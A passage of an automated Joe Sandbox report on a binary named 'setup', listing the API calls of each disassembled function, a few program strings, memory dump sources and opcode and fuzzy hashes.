                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F55B
                                                                                                      • Part of subcall function 0020F4E0: CharToOemW.USER32 ref: 0020F590
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F5D5
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F5F1
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F60B
                                                                                                      • Part of subcall function 0020F4E0: CharToOemW.USER32 ref: 0020F646
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F66D
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F689
                                                                                                      • Part of subcall function 0020F4E0: malloc.MSVCRT ref: 0020F6A3
                                                                                                    • _wremove.MSVCRT ref: 002105FF
                                                                                                      • Part of subcall function 001EF270: memmove.MSVCRT(?,?,?,?,00000000,0020F8C4), ref: 001EF2CE
                                                                                                    • free.MSVCRT ref: 00210624
                                                                                                    • free.MSVCRT ref: 00210632
                                                                                                    • free.MSVCRT ref: 00210640
                                                                                                    • free.MSVCRT ref: 00210685
                                                                                                    • _close.MSVCRT ref: 002107F3
                                                                                                    • malloc.MSVCRT ref: 00210814
                                                                                                    • malloc.MSVCRT ref: 0021082A
                                                                                                    • exit.MSVCRT ref: 00210876
                                                                                                    • _close.MSVCRT ref: 00210883
                                                                                                    • malloc.MSVCRT ref: 002108A5
                                                                                                    • malloc.MSVCRT ref: 002108BB
                                                                                                    • exit.MSVCRT ref: 00210907
                                                                                                    • _close.MSVCRT ref: 00210913
                                                                                                    • malloc.MSVCRT ref: 00210934
                                                                                                    • malloc.MSVCRT ref: 0021094A
                                                                                                    • exit.MSVCRT ref: 00210996
                                                                                                    • _close.MSVCRT ref: 002109A3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$_closefree$exit$Char$_wremovememmove
                                                                                                    • String ID: @q(
                                                                                                    • API String ID: 3138620770-2353706143
                                                                                                    • Opcode ID: 80bfe0504b8bf882c1188fd45276c5a68b4eb95c9fffa23e9002d7824133fa60
                                                                                                    • Instruction ID: ef9edbc700ca9b8cbe2696a19f1b133f81d1de61fa0463eb886fa33f1f9e6fec
                                                                                                    • Opcode Fuzzy Hash: 80bfe0504b8bf882c1188fd45276c5a68b4eb95c9fffa23e9002d7824133fa60
                                                                                                    • Instruction Fuzzy Hash: 603112B4A14B418FD721EF38C5857AABBE0BF44300F408C2DE4DA97642E774A890CF42
                                                                                                    APIs
                                                                                                    • ClipCursor.USER32 ref: 0024AE4A
                                                                                                    • ClientToScreen.USER32 ref: 0024AEB1
                                                                                                    • SetCursorPos.USER32 ref: 0024AEC9
                                                                                                    • SetCursor.USER32 ref: 0024AEEC
                                                                                                      • Part of subcall function 002470E0: GetLastError.KERNEL32 ref: 0024712B
                                                                                                      • Part of subcall function 002470E0: FormatMessageW.KERNEL32 ref: 00247163
                                                                                                      • Part of subcall function 002470E0: WideCharToMultiByte.KERNEL32 ref: 002471A7
                                                                                                    • RegisterRawInputDevices.USER32 ref: 0024AF4B
                                                                                                    Strings
                                                                                                    • Win32: Failed to remove raw input device, xrefs: 0024AF5C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$ByteCharClientClipDevicesErrorFormatInputLastMessageMultiRegisterScreenWide
                                                                                                    • String ID: Win32: Failed to remove raw input device
                                                                                                    • API String ID: 1206734558-53561655
                                                                                                    • Opcode ID: c78a76fd8afb1bfe1e97a66309c5e43cb7e2402031782472e96736540686bbf1
                                                                                                    • Instruction ID: 61f2436d015740a286082724b552acb35207eee81ec72730fcbd6caa8a938dea
                                                                                                    • Opcode Fuzzy Hash: c78a76fd8afb1bfe1e97a66309c5e43cb7e2402031782472e96736540686bbf1
                                                                                                    • Instruction Fuzzy Hash: F631D5B4509301CFD740EF25D64835EBBF0BF8870AF01892DE8888A266D7B5D998CB57
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$wcscmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 4021281200-0
                                                                                                    • Opcode ID: 1b1820efcd8424702f1305edd38d8da020ae0cb2e5c464b76a96b3bf64bd91df
                                                                                                    • Instruction ID: 9f561f5d37d31f464dceb508c0cdee4031883b23429843bf145920a1c3db5c61
                                                                                                    • Opcode Fuzzy Hash: 1b1820efcd8424702f1305edd38d8da020ae0cb2e5c464b76a96b3bf64bd91df
                                                                                                    • Instruction Fuzzy Hash: C41182B1508B408BDBA0BF25E98575EB7E0BF00318F46586CE8C887252EB34DA45DB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientScreen$AdjustLongRect
                                                                                                    • String ID: 4
                                                                                                    • API String ID: 1989598117-4088798008
                                                                                                    • Opcode ID: f141a77b092ccd637ece6868cd959f3b52fcc9d40d77bbf3ac7d2e7605794410
                                                                                                    • Instruction ID: fe39489d729ea3a554e361d61c6cb243fb1b5084b77a8cb3402a90f5fd8d8aca
                                                                                                    • Opcode Fuzzy Hash: f141a77b092ccd637ece6868cd959f3b52fcc9d40d77bbf3ac7d2e7605794410
                                                                                                    • Instruction Fuzzy Hash: BC21D5B5A083019FDB04EF28D68821ABBF4BF89315F05892EE8889B355D774D954CF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientScreen$AdjustLongRect
                                                                                                    • String ID: 4
                                                                                                    • API String ID: 1989598117-4088798008
                                                                                                    • Opcode ID: f141a77b092ccd637ece6868cd959f3b52fcc9d40d77bbf3ac7d2e7605794410
                                                                                                    • Instruction ID: 2610d46d3d5290c20eb2fd364614d4eeaf43019f312f02f18658d728f920de5a
                                                                                                    • Opcode Fuzzy Hash: f141a77b092ccd637ece6868cd959f3b52fcc9d40d77bbf3ac7d2e7605794410
                                                                                                    • Instruction Fuzzy Hash: 0B21A8756083018FDB04EF28D68821ABBF4BF89315F15892EE8989B355D774D954CF82
                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,002150E7,00000001,?,00231BA6,?,FFE7FFFF), ref: 0021417E
                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,00231BA6,?,FFE7FFFF), ref: 002141AD
                                                                                                    • CloseHandle.KERNEL32(?,?,00231BA6,?,FFE7FFFF), ref: 002141B9
                                                                                                    • CoTaskMemFree.OLE32(?,?,00231BA6,?,FFE7FFFF), ref: 002141D5
                                                                                                    • CoTaskMemFree.OLE32(?,?,00231BA6,?,FFE7FFFF), ref: 002141DF
                                                                                                    • DeleteCriticalSection.KERNEL32(00000070,?,?,00231BA6,?,FFE7FFFF), ref: 00214201
                                                                                                    • DeleteCriticalSection.KERNEL32(-00000088,?,00231BA6,?,FFE7FFFF), ref: 0021420A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalDeleteFreeSectionTask$CloseCreateEventHandleObjectSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3595854655-0
                                                                                                    • Opcode ID: 13005136af9fbf4f402a953e28157428462cd2d837ec85e6538895616e302d3e
                                                                                                    • Instruction ID: 5f5e058e8a7a88738f33f7cf89f49e81fafaae5c7d7a0d39e1eb4e861e071c70
                                                                                                    • Opcode Fuzzy Hash: 13005136af9fbf4f402a953e28157428462cd2d837ec85e6538895616e302d3e
                                                                                                    • Instruction Fuzzy Hash: FB116D75610B05AFD721BF65CC84A9ABBE8FF14311B004A2DF58993621C7B1ECA98F50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$CloseHandlestrlenstrncmp
                                                                                                    • String ID: \
                                                                                                    • API String ID: 3830564244-2967466578
                                                                                                    • Opcode ID: 26e5ce1639bea64ce5d53fb5f11feebfd1404771b58432802d09952710501c37
                                                                                                    • Instruction ID: 2e4c0a4a0074efe9223dc53b29e4a3d5d496aa42f1012b67b74c4df173b66a0b
                                                                                                    • Opcode Fuzzy Hash: 26e5ce1639bea64ce5d53fb5f11feebfd1404771b58432802d09952710501c37
                                                                                                    • Instruction Fuzzy Hash: C5116AB14087419FD721AF64D98875EBBF0FF90304F05882EE98886251E7B9D548CF83
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Char_lseeki64exitfreelongjmp
                                                                                                    • String ID: %s$ERROR: file seek operation failed
                                                                                                    • API String ID: 2964819914-4263853135
                                                                                                    • Opcode ID: 23fc8cd126808550d572706caa0a262311e244b04046d9cb17c5fe3039027f0c
                                                                                                    • Instruction ID: 956f5f941534d4ac20453332ed96785c5cc08cffbb475cd45c69148c166ec9dd
                                                                                                    • Opcode Fuzzy Hash: 23fc8cd126808550d572706caa0a262311e244b04046d9cb17c5fe3039027f0c
                                                                                                    • Instruction Fuzzy Hash: 3C21F6B05187069FC760EF29C18072EF7E0BF48700F41882CE9889B342DB74A955CF96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Fatal error: DataTables::shift() called when list of tables contains more than one entry, xrefs: 00208A44
                                                                                                    • %s, xrefs: 0020898B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exitlongjmp
                                                                                                    • String ID: %s$Fatal error: DataTables::shift() called when list of tables contains more than one entry
                                                                                                    • API String ID: 2151770896-651730184
                                                                                                    • Opcode ID: 5e55ad82bf06497e3f71e3c7859c163bb19bea3e14eca2629acbba3198b2e281
                                                                                                    • Instruction ID: 75e58e2360f13c95e9fe46a86301dd6de9d9b281023dce4e3e5e4d0105747671
                                                                                                    • Opcode Fuzzy Hash: 5e55ad82bf06497e3f71e3c7859c163bb19bea3e14eca2629acbba3198b2e281
                                                                                                    • Instruction Fuzzy Hash: 471179B12283059BC310BF24D44122FB7E0BF04300F55882EE9CC97242DBB5D995DB97
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
